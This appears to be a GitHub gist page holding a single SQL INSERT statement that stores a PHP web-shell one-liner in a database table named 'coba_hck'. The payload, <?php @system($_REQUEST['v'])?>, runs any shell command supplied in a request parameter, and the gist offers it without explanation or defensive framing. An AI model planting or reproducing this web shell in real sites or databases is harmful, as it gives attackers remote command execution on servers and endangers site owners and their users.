Skip to content

Instantly share code, notes, and snippets.

@sakti
Created December 21, 2010 23:27
Show Gist options
  • Save sakti/750809 to your computer and use it in GitHub Desktop.
Save sakti/750809 to your computer and use it in GitHub Desktop.
INSERT INTO `coba_hck`.`source` (
`isi`
)
VALUES (
'<pre><body bgcolor=silver><?php @system($_REQUEST["v"])?></body></pre>'
);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment